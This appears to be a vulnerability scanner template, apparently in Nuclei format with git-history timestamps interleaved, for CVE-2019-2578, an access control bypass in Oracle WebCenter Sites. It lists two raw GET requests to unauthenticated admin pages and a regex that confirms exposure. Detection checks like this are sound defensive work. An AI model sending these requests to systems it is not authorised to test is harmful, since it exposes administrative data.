2021-11-06 00:24:41 +00:00
id : CVE-2019-2578
info :
name : Broken Access Control Oracle WebCenter Sites
author : leovalcante
severity : high
2021-11-06 08:11:08 +00:00
description : Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
2021-11-06 00:24:41 +00:00
reference : https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
2021-11-06 08:11:08 +00:00
tags : cve,cve2019,oracle,wcs,auth-bypass
2021-11-06 08:18:29 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.60
cve-id : CVE-2019-2578
2021-11-06 00:24:41 +00:00
requests :
- raw :
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
2021-11-06 08:11:08 +00:00
Host : {{Hostname}}
2021-11-06 00:24:41 +00:00
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
2021-11-06 08:11:08 +00:00
Host : {{Hostname}}
stop-at-first-match : true
2021-11-06 00:24:41 +00:00
matchers :
- type : regex
part : body
2021-11-06 08:11:08 +00:00
regex :
- '<script[\d\D]*<throwexception/>'